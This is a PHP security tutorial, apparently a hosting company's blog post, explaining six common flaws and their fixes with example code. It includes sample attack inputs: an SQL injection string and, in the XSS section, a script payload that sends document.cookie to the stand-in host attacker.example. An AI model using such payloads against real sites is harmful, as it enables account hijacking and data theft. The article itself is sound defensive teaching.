6 Common PHP Security Issues And Their Remedies
Security is a delicate matter that all PHP developers should be aware of. However, not every PHP developer knows the basic measures that prevent the most common security flaws.
Read this article to learn about 6 common PHP security issues and what you can do to avoid them.
As you know, PHP is a very popular server-side scripting language. According to W3Techs, more than 80% of Web sites whose server-side language is known are based on PHP. The language is well suited to creating dynamic Web sites: PHP takes a stream of text as input (the HTTP request) and outputs a result in the form of HTML, JSON, XML, an image, audio, etc. (the HTTP response).
Besides this extensive usage, a report based on the National Vulnerability Database (NVD) indicates that about 9% of recorded vulnerabilities are related to PHP. In other words, some programmers inadvertently leave weaknesses in their code, and PHP sites become vulnerable as a result.
Although taint checking (available for PHP through an extension) can help detect some types of security issues, there are many other security concerns that PHP developers should keep in mind. They are listed below.
1. SQL Injection Vulnerabilities
SQL injection is the most commonly reported security issue. It is mainly associated with Web sites built on large code bases written long ago, when developers were less security aware.
Through this kind of attack, an attacker can read the database behind the PHP Web site, and often modify or delete its contents. The problem arises when user-supplied data is placed into a query without validation and without escaping or parameter binding.
$name = $_GET['name']; // untrusted request parameter, concatenated straight into the query
$query = "SELECT * FROM students WHERE empname='$name'";
With name=David the query is the one the developer intended. If the attacker instead sends name=' or '1 (a quote, the word or, and a quote followed by 1), the query becomes:
$query = "SELECT * FROM students WHERE empname='' or '1'";
The WHERE clause is now true for every row, so the whole students table is returned. Depending on where the injected value lands, the same technique lets an attacker bypass a login check, read other tables, or modify and delete data.
Before being processed by the application, input data should be validated, and invalid data should be rejected outright. Valid data must then be passed to the database as bound parameters of prepared statements, which both MySQLi and PDO support, so that the SQL text never contains user data. Escaping with the driver's own escaping function is a fallback for the rare cases where a value cannot be bound; remember that identifiers such as table and column names cannot be bound at all and must be checked against an allow list.
Passwords must never be stored in clear text; hash them with the password_hash() function and check them with password_verify().
Technical details should be removed from error messages displayed to users. Attackers specifically look at error messages for information such as database names, user names, table names and file paths, and use it to refine their attacks. Disable the display of errors in production, or replace them with your own generic error messages while logging the details server-side.
You can also limit the permissions of the database user your application connects with. Grant that user only the privileges it needs on the specific tables and views it uses (typically SELECT, INSERT and UPDATE), and never DROP, ALTER or other schema-changing privileges; routing access through stored procedures narrows what a query can touch further. Filtering keywords such as drop, union, update or insert out of user input is not a substitute for this: keyword blacklists are routinely bypassed, whereas a privilege the account does not have cannot be used no matter what is injected.
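The following is an added example, not code from the original article. It puts the vulnerable concatenation from this section next to its prepared-statement replacement, and adds the password_hash()/password_verify() login check. The table and column names (students, empname, accounts, password_hash), the DSN and the credentials are assumptions; the name validation rule is one possible policy.

```php
<?php
// Added example (not from the original article). Table/column names, DSN and
// credentials are assumptions.
declare(strict_types=1);

// VULNERABLE: the parameter is concatenated into the SQL text, so
// ?name=' or '1 turns the WHERE clause into  empname='' or '1'  and matches
// every row. Shown only for contrast; never do this.
function findStudentsVulnerable(PDO $db, string $name): array
{
    $query = "SELECT * FROM students WHERE empname='$name'";
    return $db->query($query)->fetchAll(PDO::FETCH_ASSOC);
}

// SAFE: the SQL text is fixed; the value travels separately as a bound
// parameter, so quotes and keywords inside $name are just data.
function findStudentsSafe(PDO $db, string $name): array
{
    $stmt = $db->prepare('SELECT id, empname FROM students WHERE empname = :name');
    $stmt->execute([':name' => $name]);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Registration: store only a password_hash() digest, never the password.
function createAccount(PDO $db, string $user, string $password): void
{
    $stmt = $db->prepare('INSERT INTO accounts (username, password_hash) VALUES (:u, :h)');
    $stmt->execute([':u' => $user, ':h' => password_hash($password, PASSWORD_DEFAULT)]);
}

// Login: look the account up with a bound parameter and let password_verify()
// do the (constant-time) comparison against the stored digest.
function checkLogin(PDO $db, string $user, string $password): bool
{
    $stmt = $db->prepare('SELECT password_hash FROM accounts WHERE username = :u');
    $stmt->execute([':u' => $user]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row !== false && password_verify($password, $row['password_hash']);
}

// Connection: server-side prepared statements (no client-side emulation) and
// exceptions instead of silently returning false on failure.
$db = new PDO('mysql:host=localhost;dbname=school;charset=utf8mb4', 'app_user', 'secret', [
    PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
    PDO::ATTR_EMULATE_PREPARES => false,
]);

// Validate first: reject anything that cannot be a name at all. Apostrophes
// are legitimately allowed (O'Brien); the prepared statement handles them safely.
$name = $_GET['name'] ?? '';
if (!preg_match('/^[\p{L} .\'-]{1,64}$/u', $name)) {
    http_response_code(400);
    exit('Invalid name');
}
print_r(findStudentsSafe($db, $name));
```

Try the safe function with the payload from the text (' or '1): it returns only rows whose empname is literally that string, i.e. none, while the vulnerable one returns the whole table.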
2. Buffer Overflows
Usually, a buffer overflow is not caused directly by code written in an interpreted language like PHP. However, the PHP engine and many of its extensions are written in C, so buffer overflows can occur due to bugs in that C code. In other words, PHP applications themselves do not overflow buffers, but the engine running them can.
PHP code does not allocate memory directly; the C code of the PHP engine allocates and frees the memory it needs. A buffer overflow occurs when that C code writes beyond the boundaries of a block of memory it allocated.
Buffer overflows may let an attacker make the PHP engine execute arbitrary code, which can then be used for further exploits.
Since the bug lives in the C code of the engine, you cannot tell whether your PHP code may trigger a buffer overflow just by looking at the PHP code.
The primary remedy is to keep the PHP engine and every loaded extension updated, since these bugs are fixed in releases rather than in your application. The Suhosin extension could additionally alter the way PHP memory is allocated, detecting many overflow occurrences and stopping the engine before they could be exploited; note, however, that Suhosin targets PHP 5 and is not maintained for current PHP versions.
3. XSS Exploits
Cross-site scripting (XSS) happens when untrusted input is placed into a page without being encoded, so the browser treats it as markup or script. In the stored variant, the malicious code is saved in the database as if it were legitimate content and is served to every visitor of the page; in the reflected variant it comes straight from the request, for instance a search parameter. When a victim opens the page, the injected script runs with the privileges of your site: it can send cookies and session identifiers to a third-party site controlled by the attacker, or redirect the user to a spam or phishing site.
XSS is therefore also used to hijack user accounts. When the attacker obtains the PHP session cookie value, he can access the user's account as if he were the real user.
Prevention of XSS Exploits
XSS vulnerabilities are avoided by encoding untrusted data for the context it is output in; in HTML, at least the characters <, >, &, " and ' must become entities. Sites that want users to format their posts, such as forums, should accept a restricted markup like BBCode and render it to HTML themselves instead of accepting raw HTML.
The htmlspecialchars() function does this conversion. Pass ENT_QUOTES as the second argument so that single quotes are encoded too (since PHP 8.1 the default flags are ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML401), and always give the character set as the third argument. The strip_tags() function removes HTML and PHP tags from a string, but it is a filter, not an encoder: text that contains no tags passes through unchanged, so its output still needs encoding before being placed in a page.
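As an added example (not code from the original article), the reflected-XSS pattern described above next to context-aware encoding. The helper names e() and js() and the attacker-controlled sample value are constructed for this illustration; the point it makes beyond the text is that htmlspecialchars() covers HTML body and attribute contexts, while a value embedded in inline JavaScript needs json_encode() with the JSON_HEX_* flags.

```php
<?php
// Added example (not from the original article). e(), js() and the sample
// payload are constructed for this illustration.
declare(strict_types=1);

// Encode for an HTML body or a quoted attribute value. ENT_QUOTES covers both
// quote styles, so the value is safe inside attr="..." and attr='...';
// ENT_SUBSTITUTE keeps invalid UTF-8 from silently producing an empty string.
function e(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

// Encode for a value embedded in inline JavaScript. htmlspecialchars() is the
// wrong tool here; json_encode() with these flags yields a JS string literal
// that cannot close the <script> element or break out of the string.
function js(string $s): string
{
    return json_encode($s, JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT | JSON_THROW_ON_ERROR);
}

// Constructed attacker input, as it would arrive in ?q=...
$q = $_GET['q'] ?? '"><script>document.location="https://attacker.example/?c="+document.cookie</script>';

// VULNERABLE: the raw parameter lands in the page and the browser executes it.
// echo "<input name=\"q\" value=\"$q\">";

// SAFE: encoded once, for the context each value is placed in.
echo '<input name="q" value="' . e($q) . '">' . "\n";
echo '<p>You searched for ' . e($q) . '</p>' . "\n";
echo '<script>var query = ' . js($q) . ';</script>' . "\n";

// strip_tags() is not an XSS defence on its own: this value contains no tags,
// passes through unchanged, and becomes an event handler once it is placed
// inside an unencoded attribute. Encoding is still required afterwards.
$probe = '" onmouseover="alert(1)';
assert(strip_tags($probe) === $probe);
echo '<input value="' . e(strip_tags($probe)) . '">' . "\n";
```

Run it with php -S and request ?q=<script>alert(1)</script>: the page shows the payload as text, and the inline script block receives it as a harmless string literal.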
4. Error Handling Problems
Another important area of concern is error handling. Detailed error output tells an attacker about your software versions, file paths, PHP code, database tables and external programs, and those details are used to tailor an exploit.
Detailed descriptions should therefore be kept out of error messages shown to users. You can structure your PHP code so that full error details are sent to the server's error log instead of being displayed, through the error-reporting options of the php.ini configuration file.
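The following added example (not from the original article) shows one way to do this: the php.ini directives are listed in comments, the same settings are applied at runtime with ini_set(), and an exception handler logs the full detail while the user receives only a generic message with a reference id. The log path, the reference-id format and the deliberately failing database connection are assumptions made for the illustration.

```php
<?php
// Added example (not from the original article). Log path and the constructed
// failure at the end are assumptions.
declare(strict_types=1);

// php.ini equivalents (preferred in production, so they apply before any script runs):
//   display_errors = Off
//   display_startup_errors = Off
//   log_errors = On
//   error_log = /var/log/php/app.log
ini_set('display_errors', '0');
ini_set('display_startup_errors', '0');
ini_set('log_errors', '1');
ini_set('error_log', '/var/log/php/app.log');
error_reporting(E_ALL);

// Turn warnings and notices into exceptions so a single handler sees everything.
set_error_handler(function (int $no, string $str, string $file, int $line): bool {
    throw new ErrorException($str, 0, $no, $file, $line);
});

// Log class, message, file, line and trace server-side; show the user only a
// generic message and a reference id they can quote when contacting support.
set_exception_handler(function (Throwable $e): void {
    $ref = bin2hex(random_bytes(6));
    error_log(sprintf(
        '[%s] %s: %s in %s:%d%s%s',
        $ref, get_class($e), $e->getMessage(), $e->getFile(), $e->getLine(),
        PHP_EOL, $e->getTraceAsString()
    ));
    http_response_code(500);
    header('Content-Type: text/plain; charset=utf-8');
    echo "Something went wrong. Reference: $ref\n";
});

// Constructed failure: a connection that cannot succeed. The host name,
// database name, user name and driver error text end up in the log only;
// the browser sees just the reference id.
new PDO('mysql:host=db.internal;dbname=school', 'app_user', 'wrong-password');
```

Compare the browser output with the log line: the log carries everything needed to debug, the response carries nothing an attacker can use.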
5. Remote Administration Flaws
It is also recommended that remote administration tools are only used over encrypted connections, so that administrator passwords and the content being managed cannot be intercepted.
Moreover, if you have remote access with administration rights via third-party software, change its default credentials and its default administrative URL. It is safer still to serve administrative tools from a separate Web server, or at least a separate host name and network restriction, rather than from the public Web server.
6. Session And Cookie Hijacking
Session and cookie hijacking does not attack the database or the Web application directly, but it lets the attacker act as a logged-in user. When the user first contacts the Web server, a session may be started.
A session is the interval of interaction between a user and the Web application, during which the user may be authenticated. With PHP sessions, by default, the Web site stores the user's session data in a file on the server and sends only the session identifier to the browser as a cookie.
The attacker therefore tries to obtain the user's session ID, which is created when the session is first started for a given user accessing the site.
You can use the session_regenerate_id() function to change the session ID, ideally at login and whenever privileges change, passing true so that the old session data is deleted. If an identifier was stolen by somebody intercepting the connection between the browser and the server, or planted in the browser beforehand (session fixation), it becomes invalid as soon as the legitimate user logs in. Enabling session.use_strict_mode makes PHP reject any session ID it did not itself issue.
Asking the user to re-enter the password before sensitive operations, such as changing the password or e-mail address, limits what a hijacked session can do.
Applications that handle sensitive information like debit and credit card data must be served over TLS (HTTPS) so that session identifiers and cookies cannot be read off the wire, and the cookies themselves should carry the Secure flag. Login and password-change pages in particular should only be reachable over HTTPS.
For an ordinary cookie, set the HttpOnly flag (the last argument) like this, so that JavaScript injected through XSS cannot read it:
setcookie('mycookie', 'some value', 0, '/', '', false, true);
// arguments: name, value, expires (0 = until the browser closes), path, domain,
// secure (set to true on HTTPS sites so the cookie is never sent in clear text), httponly
For sessions, set the session cookie parameters before calling session_start():
session_set_cookie_params(600, '/', '', false, true);
// arguments: lifetime in seconds, path, domain, secure (true on HTTPS sites), httponly
Or set the the session.cookie_httponly option in php.ini:
session.cookie_httponly = On
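The following added example (not from the original article) puts the measures of this section together: a hardened session cookie, ID regeneration at login, and re-authentication for sensitive actions. It uses the options-array form of session_set_cookie_params(), which needs PHP 7.3 or later. authenticate() is a stand-in for the real credential check, and the 10-minute re-authentication window is a chosen value; both are assumptions.

```php
<?php
// Added example (not from the original article). authenticate() is a stand-in
// and REAUTH_WINDOW is a chosen value; both are assumptions. Requires PHP 7.3+.
declare(strict_types=1);

const REAUTH_WINDOW = 600; // seconds after which sensitive actions need the password again

// Cookie flags must be set before session_start().
session_set_cookie_params([
    'lifetime' => 0,        // session cookie: dropped when the browser closes
    'path'     => '/',
    'domain'   => '',
    'secure'   => true,     // only ever sent over HTTPS
    'httponly' => true,     // not readable by JavaScript, so XSS cannot exfiltrate it
    'samesite' => 'Lax',    // not sent on cross-site POSTs
]);
ini_set('session.use_strict_mode', '1'); // reject IDs the server never issued (fixation)
session_start();

function login(string $user, string $password): bool
{
    if (!authenticate($user, $password)) {
        return false;
    }
    // New ID on privilege change; true deletes the old session file, so a
    // fixated or sniffed pre-login identifier is now useless.
    session_regenerate_id(true);
    $_SESSION['user']    = $user;
    $_SESSION['auth_at'] = time();
    return true;
}

// Sensitive operations (password change, payment) require a recent password check.
function requireRecentAuth(): void
{
    if (!isset($_SESSION['auth_at']) || time() - $_SESSION['auth_at'] > REAUTH_WINDOW) {
        header('Location: /reauth.php', true, 303);
        exit;
    }
}

// Clear server-side data, expire the cookie with the same flags it was set
// with, and destroy the session.
function logout(): void
{
    $_SESSION = [];
    $p = session_get_cookie_params();
    setcookie(session_name(), '', [
        'expires'  => time() - 3600,
        'path'     => $p['path'],
        'domain'   => $p['domain'],
        'secure'   => $p['secure'],
        'httponly' => $p['httponly'],
        'samesite' => $p['samesite'],
    ]);
    session_destroy();
}

// Constructed stand-in for a database-backed check (see section 1 for
// password_hash()/password_verify()).
function authenticate(string $user, string $password): bool
{
    return $user === 'alice' && $password === 'correct horse battery staple';
}

// Usage: a login request followed by a protected action.
if (login($_POST['user'] ?? '', $_POST['password'] ?? '')) {
    requireRecentAuth();
    echo 'Logged in as ' . htmlspecialchars($_SESSION['user'], ENT_QUOTES, 'UTF-8') . "\n";
} else {
    http_response_code(401);
    echo "Login failed\n";
}
```

Inspect the Set-Cookie header after a successful login: the PHPSESSID value differs from the one sent with the request, and it carries the Secure, HttpOnly and SameSite attributes.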
PHP security issues can be avoided by following certain guidelines and precautions while coding. If you are using managed cloud hosting services, like Cloudways, that I work for, you may be provided with security measures in order to make your Web site more secure.
If you liked this article, or have questions regarding security measures, post a comment here.